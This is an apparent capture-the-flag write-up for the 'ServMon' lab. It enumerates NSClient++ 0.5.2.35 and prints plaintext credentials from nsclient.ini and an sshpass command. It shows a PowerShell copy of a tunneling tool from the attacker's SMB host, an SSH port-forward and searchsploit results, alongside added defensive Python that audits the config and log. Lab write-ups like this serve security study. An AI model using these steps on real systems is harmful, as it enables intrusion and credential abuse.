NSClient++


PS C:\Program Files> ls
 
 
    Directory: C:\Program Files
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/1/2022   1:20 AM                Common Files
d-----       11/11/2019   6:52 PM                Internet Explorer
d-----        2/28/2022   6:07 PM                MSBuild
d-----        2/28/2022   6:55 PM                NSClient++
d-----        2/28/2022   6:46 PM                NVMS-1000
d-----        2/28/2022   6:32 PM                OpenSSH-Win64
d-----        2/28/2022   6:07 PM                Reference Assemblies
d-----        2/28/2022   5:44 PM                VMware
d-r---       11/11/2019   6:52 PM                Windows Defender
d-----       11/11/2019   6:52 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----       11/11/2019   6:52 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                Windows NT
d-----       11/11/2019   6:52 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        2/28/2022   6:25 PM                WindowsPowerShell
 
PS C:\Program Files\NSClient++> cd NSClient++ ; ls 
 
 
    Directory: C:\Program Files\NSClient++
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/28/2022   6:55 PM                crash-dumps
d-----        2/28/2022   6:55 PM                modules
d-----        2/28/2022   6:55 PM                scripts
d-----        2/28/2022   6:55 PM                security
-a----        12/9/2015  12:17 AM          28672 boost_chrono-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM          50688 boost_date_time-vc110-mt-1_58.dll
-a----        12/9/2015  12:22 AM         439296 boost_program_options-vc110-mt-1_58.dll
-a----        12/9/2015  12:23 AM         256000 boost_python-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM         765952 boost_regex-vc110-mt-1_58.dll
-a----        12/9/2015  12:16 AM          19456 boost_system-vc110-mt-1_58.dll
-a----        12/9/2015  12:18 AM         102400 boost_thread-vc110-mt-1_58.dll
-a----        1/14/2020   1:24 PM             51 boot.ini
-a----        1/18/2018   3:51 PM         157453 changelog.txt
-a----        1/28/2018  10:33 PM        1210392 check_nrpe.exe
-a----        11/5/2017   9:09 PM         318464 Google.ProtocolBuffers.dll
-a----        12/8/2015  11:16 PM        1655808 libeay32.dll
-a----        11/5/2017  10:04 PM          18351 license.txt
-a----        10/5/2017   7:19 AM         203264 lua.dll
-a----        4/10/2020   6:32 PM           2683 nsclient.ini
-a----        1/30/2023   1:33 AM          41757 nsclient.log
-a----        11/5/2017   9:42 PM          55808 NSCP.Core.dll
-a----        1/28/2018  10:32 PM        4765208 nscp.exe
-a----        11/5/2017   9:42 PM         483328 NSCP.Protobuf.dll
-a----       11/19/2017   4:18 PM         534016 nscp_json_pb.dll
-a----       11/19/2017   3:55 PM        2090496 nscp_lua_pb.dll
-a----        1/23/2018   8:57 PM         507904 nscp_mongoose.dll
-a----       11/19/2017   3:49 PM        2658304 nscp_protobuf.dll
-a----        11/5/2017  10:04 PM           3921 old-settings.map
-a----        1/28/2018  10:21 PM        1973760 plugin_api.dll
-a----        5/23/2015   8:44 AM        3017216 python27.dll
-a----        9/27/2015   3:42 PM       28923515 python27.zip
-a----        1/28/2018  10:34 PM         384536 reporter.exe
-a----        12/8/2015  11:16 PM         348160 ssleay32.dll
-a----        5/23/2015   8:44 AM         689664 unicodedata.pyd
-a----        11/5/2017   9:20 PM        1273856 where_filter.dll
-a----        5/23/2015   8:44 AM          47616 _socket.pyd

After some enumeration on servmon, I found the installation directory for NSClient++ at C:\Program Files\NSClient++. It contains the nscp.exe executable, which, I assume, has to do with the process found earlier.

NSClient++ stores the web administrator password in the nsclient.ini file.

NSClient.ini


PS C:\Program Files\NSClient++> cat nsclient.ini
# If you want to fill this file with all available options run the following command: 
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults 
# For details run: nscp settings --help
 
 
; in flight - TODO
[/settings/default]
 
; Undocumented key
password = ew2x6SsGTxjRwXOT
 
; Undocumented key
allowed hosts = 127.0.0.1
 
 
; in flight - TODO
[/settings/NRPE/server] 
 
; Undocumented key
ssl options = no-sslv2,no-sslv3
 
; Undocumented key
verify mode = peer-cert
 
; Undocumented key
insecure = false
 
 
; in flight - TODO
[/modules]
 
; Undocumented key
CheckHelpers = disabled
 
; Undocumented key
CheckEventLog = disabled
 
; Undocumented key
CheckNSCP = disabled
 
; Undocumented key
CheckDisk = disabled
 
; Undocumented key
CheckSystem = disabled
 
; Undocumented key
WEBServer = enabled
 
; Undocumented key
NRPEServer = enabled
 
; CheckTaskSched - Check status of your scheduled jobs. 
CheckTaskSched = enabled
 
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
 
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
 
 
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
 
; Batch file - Command used for executing wrapped batch files 
bat = scripts\\%SCRIPT% %ARGS%
 
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
 
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
 
 
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`     
[/settings/external scripts/scripts]
 
 
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules] 
 
; Undocumented key
foobar = command = foobar
 
 
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true

Password string found: ew2x6SsGTxjRwXOT. There is also a very suggestive parameter, allowed hosts, which indicates that access is only available through localhost.
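The same findings, seen from the side of whoever has to review this file: an added example (not part of the original notes or of NSClient++) that audits an nsclient.ini for the settings called out above. The finding names and the sample text are assumptions made for the illustration.

```python
import configparser

# Constructed excerpt using the section and key names from the nsclient.ini
# shown above; the password value is a placeholder.
SAMPLE_INI = """\
[/settings/default]
password = PLACEHOLDER-NOT-A-REAL-SECRET
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
NRPEServer = enabled
CheckExternalScripts = enabled

[/settings/external scripts]
allow arguments = true
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_nsclient_ini(text):
    """Return {finding_id: explanation} for the risky settings in `text`."""
    # interpolation=None: values such as %SCRIPT% must be read literally.
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string(text)

    def get(section, key):
        return cfg.get(section, key, fallback="").strip()

    findings = {}
    if get("/settings/default", "password"):
        findings["plaintext-password"] = (
            "password is stored in clear text; any account that can read "
            "the file can use it")
    raw_hosts = get("/settings/default", "allowed hosts")
    hosts = {h.strip() for h in raw_hosts.split(",") if h.strip()}
    if hosts and hosts <= LOOPBACK:
        findings["loopback-only"] = (
            "allowed hosts stops remote clients only; local users and "
            "forwarded ports still reach the service")
    if (get("/modules", "WEBServer").lower() == "enabled"
            and "plaintext-password" in findings):
        findings["web-admin-exposed"] = (
            "WEBServer is enabled and its credential sits in this file")
    if (get("/modules", "CheckExternalScripts").lower() == "enabled"
            and get("/settings/external scripts",
                    "allow arguments").lower() == "true"):
        findings["script-arguments"] = (
            "external scripts accept caller-supplied arguments")
    return findings
```
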

NSClient.log


PS C:\Program Files\NSClient++> cat nsclient.log
 
[...REDACTED...]
 
2023-01-30 00:01:40: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:01:47: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:02:32: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:02:32: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:04:24: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:04:29: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 00:22:14: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 10.10.14.11
2023-01-30 01:33:19: error:c:\source\master\include\socket/server.hpp:255: Socket ERROR: Already open
2023-01-30 01:33:31: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: dead:beef:2::1009
2023-01-30 01:33:41: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: dead:beef:2::1009

Checking the log file confirms the localhost-only rule above, as the IP address of Kali was rejected according to it. This explains why the web server on port 8443 was not responsive earlier.

I would need to tunnel it in order to further enumerate it.
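Those rejected connections are also what a defender would see of this probing. An added example (not part of the original notes) that summarises "Rejected connection from" entries per source; the sample lines are constructed in the format of the log excerpt above, with documentation addresses, and the threshold of 3 is an assumption.

```python
import re

# Constructed lines in the format of the nsclient.log excerpt above;
# the addresses are documentation ranges, not the ones from the page.
SAMPLE_LOG = r"""
2023-01-30 00:01:40: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 192.0.2.11
2023-01-30 00:01:47: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 192.0.2.11
2023-01-30 00:04:24: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 192.0.2.11
2023-01-30 01:33:19: error:c:\source\master\include\socket/server.hpp:255: Socket ERROR: Already open
2023-01-30 01:33:31: error:c:\source\master\include\nrpe/server/protocol.hpp:98: Rejected connection from: 2001:db8::1009
""".strip().splitlines()

# Timestamp, source location, then the rejection message and the peer
# address (IPv4 or IPv6, so the address is matched as any non-space run).
REJECT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}): error:.*: "
    r"Rejected connection from: (?P<src>\S+)\s*$")


def rejected_sources(lines):
    """Map each rejected source to its count and first/last timestamps."""
    seen = {}
    for line in lines:
        m = REJECT_RE.match(line.strip())
        if not m:
            continue  # other errors, e.g. "Socket ERROR: Already open"
        entry = seen.setdefault(m["src"], {"count": 0, "first": m["ts"]})
        entry["count"] += 1
        entry["last"] = m["ts"]
    return seen


def repeat_offenders(lines, threshold=3):
    """Sources rejected at least `threshold` times, worth an alert."""
    return sorted(src for src, entry in rejected_sources(lines).items()
                  if entry["count"] >= threshold)


if __name__ == "__main__":
    for src, entry in rejected_sources(SAMPLE_LOG).items():
        print(src, entry)
    print("alert on:", repeat_offenders(SAMPLE_LOG))
```
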

Webroot


PS C:\Program Files\NSClient++> cd .\web\
PS C:\Program Files\NSClient++\web> ls
 
 
    Directory: C:\Program Files\NSClient++\web
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/28/2022   6:55 PM                static
-a----        11/5/2017  10:11 PM           5717 index.html

I can also see the webroot at C:\Program Files\NSClient++\web.

Tunneling


PS C:\tmp> copy \\10.10.14.11\smb\chiselx64.exe 
copy : Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
At line:1 char:1
+ copy \\10.10.14.11\smb\chiselx64.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand 

I would normally use Chisel for tunneling, but the local AV blocked it. Since SSH is enabled on the system, I will take advantage of that instead.

┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ sshpass -p 'l1k3b1gbut7s@w0rk' ssh nadine@$ip -N -f -L 8443:127.0.0.1:8443

Tunneling the 127.0.0.1:8443 socket of the target system through Kali’s any interface on port 8443.

Web


Now I can access the NSClient++ web service as if I were accessing it from the target’s localhost.

Not only are the tabs at the top now responsive, there is also a login page greeting me. I will try to log in with the web administrator password found earlier.

Successfully logged in. I was looking for the version information and could not find it.

Then I learned online that there is a dedicated command line tool for NSClient++. It’s called nscp. This was also listed in the installation directory.

PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

There I got the version information: NSClient++ 0.5.2.35.

Vulnerability


┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ searchsploit NSClient++ 0.5.2.35
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                | windows/local/46802.txt
NSClient++ 0.5.2.35 - Privilege Escalation                | windows/local/46802.txt
---------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results

Searching for NSClient++ 0.5.2.35 on Exploit-DB reveals that it suffers from RCE. Moving on to the privilege escalation phase.